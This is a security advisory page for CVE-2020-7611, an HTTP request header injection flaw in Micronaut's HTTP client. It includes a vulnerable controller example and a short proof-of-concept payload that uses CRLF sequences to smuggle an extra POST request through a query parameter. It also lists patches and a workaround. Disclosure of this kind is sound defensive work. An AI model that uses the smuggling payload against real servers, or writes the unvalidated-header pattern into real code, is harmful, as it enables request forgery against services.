GHSA-694P-XRHG-X3WM

Vulnerability from github – Published: 2020-03-30 20:54 – Updated: 2023-11-06 11:08
VLAI?
Summary
Micronaut's HTTP client is vulnerable to HTTP Request Header Injection
Details

Vulnerability

Micronaut's HTTP client is vulnerable to "HTTP Request Header Injection" due to not validating request headers passed to the client.

Example of vulnerable code:

@Controller("/hello")
public class HelloController {

    @Inject
    @Client("/")
    RxHttpClient client;

    @Get("/external-exploit")
    @Produces(MediaType.TEXT_PLAIN)
    public String externalExploit(@QueryValue("header-value") String headerValue) {
        return client.toBlocking().retrieve(
            HttpRequest.GET("/hello")
                .header("Test", headerValue)
        );
    }
}

In the above case a query value received from a user is passed as a header value to the client. Since the client doesn't validate the header value the request headers and body have the potential to be manipulated.

For example, a user that supplies the following payload, can force the client to make multiple attacker-controlled HTTP requests.

List<String> headerData = List.of(
    "Connection: Keep-Alive", // This keeps the connection open so another request can be stuffed in.
    "",
    "",
    "POST /hello/super-secret HTTP/1.1",
    "Host: 127.0.0.1",
    "Content-Length: 31",
    "",
    "{\"new\":\"json\",\"content\":\"here\"}",
    "",
    ""
);
String headerValue = "H\r\n" + String.join("\r\n", headerData);;
URI theURI =
    UriBuilder
        .of("/hello/external-exploit")
        .queryParam("header-value", headerValue) // Automatically URL encodes data
        .build();
HttpRequest<String> request = HttpRequest.GET(theURI);
String body = client.toBlocking().retrieve(request);

Note that using @HeaderValue instead of @QueryValue is not vulnerable since Micronaut's HTTP server does validate the headers passed to the server, so the exploit can only be triggered by using user data that is not an HTTP header (query values, form data etc.).

Impact

The attacker is able to control the entirety of the HTTP body for their custom requests. As such, this vulnerability enables attackers to perform a variant of Server Side Request Forgery.

Patches

The problem has been patched in the micronaut-http-client versions 1.2.11 and 1.3.2 and above.

Workarounds

Do not pass user data directly received from HTTP request parameters as headers in the HTTP client.

References

Fix commits - https://github.com/micronaut-projects/micronaut-core/commit/9d1eff5c8df1d6cda1fe00ef046729b2a6abe7f1 - https://github.com/micronaut-projects/micronaut-core/commit/6deb60b75517f80c57b42d935f07955c773b766d - https://github.com/micronaut-projects/micronaut-core/commit/bc855e439c4a5ced3d83195bb59d0679cbd95add

For more information

If you have any questions or comments about this advisory:

Credit

Originally reported by @JLLeitschuh

Severity ?
9.8 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.micronaut:micronaut-http-client"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.2.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.micronaut:micronaut-http-client"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.3.0"
            },
            {
              "fixed": "1.3.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-7611"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-03-30T20:54:42Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Vulnerability\n\nMicronaut\u0027s HTTP client is vulnerable to \"HTTP Request Header Injection\" due to not validating request headers passed to the client.\n\nExample of vulnerable code:\n\n```java\n@Controller(\"/hello\")\npublic class HelloController {\n\n    @Inject\n    @Client(\"/\")\n    RxHttpClient client;\n\n    @Get(\"/external-exploit\")\n    @Produces(MediaType.TEXT_PLAIN)\n    public String externalExploit(@QueryValue(\"header-value\") String headerValue) {\n        return client.toBlocking().retrieve(\n            HttpRequest.GET(\"/hello\")\n                .header(\"Test\", headerValue)\n        );\n    }\n}\n```\n\nIn the above case a query value received from a user is passed as a header value to the client. Since the client doesn\u0027t validate the header value the request headers and body have the potential to be manipulated.\n\nFor example, a user that supplies the following payload, can force the client to make multiple attacker-controlled HTTP requests.\n\n```java\nList\u003cString\u003e headerData = List.of(\n    \"Connection: Keep-Alive\", // This keeps the connection open so another request can be stuffed in.\n    \"\",\n    \"\",\n    \"POST /hello/super-secret HTTP/1.1\",\n    \"Host: 127.0.0.1\",\n    \"Content-Length: 31\",\n    \"\",\n    \"{\\\"new\\\":\\\"json\\\",\\\"content\\\":\\\"here\\\"}\",\n    \"\",\n    \"\"\n);\nString headerValue = \"H\\r\\n\" + String.join(\"\\r\\n\", headerData);;\nURI theURI =\n    UriBuilder\n        .of(\"/hello/external-exploit\")\n        .queryParam(\"header-value\", headerValue) // Automatically URL encodes data\n        .build();\nHttpRequest\u003cString\u003e request = HttpRequest.GET(theURI);\nString body = client.toBlocking().retrieve(request);\n```\n\nNote that using `@HeaderValue` instead of `@QueryValue` is not vulnerable since Micronaut\u0027s HTTP server does validate the headers passed to the server, so the exploit can only be triggered by using user data that is not an HTTP header (query values, form data etc.).\n\n### Impact\n\nThe attacker is able to control the entirety of the HTTP body for their custom requests.\nAs such, this vulnerability enables attackers to perform a variant of [Server Side Request Forgery](https://cwe.mitre.org/data/definitions/918.html).\n\n### Patches\n\nThe problem has been patched in the `micronaut-http-client` versions 1.2.11 and 1.3.2 and above.\n\n### Workarounds\n\nDo not pass user data directly received from HTTP request parameters as headers in the HTTP client.\n\n### References\n\nFix commits\n- https://github.com/micronaut-projects/micronaut-core/commit/9d1eff5c8df1d6cda1fe00ef046729b2a6abe7f1\n- https://github.com/micronaut-projects/micronaut-core/commit/6deb60b75517f80c57b42d935f07955c773b766d\n- https://github.com/micronaut-projects/micronaut-core/commit/bc855e439c4a5ced3d83195bb59d0679cbd95add\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [micronaut-core](https://github.com/micronaut-projects/micronaut-core)\n* Email us at [info@micronaut.io](mailto:info@micronaut.io)\n\n### Credit\n\nOriginally reported by @JLLeitschuh \n",
  "id": "GHSA-694p-xrhg-x3wm",
  "modified": "2023-11-06T11:08:02Z",
  "published": "2020-03-30T20:54:55Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-694p-xrhg-x3wm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7611"
    },
    {
      "type": "WEB",
      "url": "https://github.com/micronaut-projects/micronaut-core/commit/6deb60b75517f80c57b42d935f07955c773b766d"
    },
    {
      "type": "WEB",
      "url": "https://github.com/micronaut-projects/micronaut-core/commit/9d1eff5c8df1d6cda1fe00ef046729b2a6abe7f1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/micronaut-projects/micronaut-core/commit/bc855e439c4a5ced3d83195bb59d0679cbd95add"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/micronaut-projects/micronaut-core"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JAVA-IOMICRONAUT-561342"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Micronaut\u0027s HTTP client is vulnerable to HTTP Request Header Injection"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.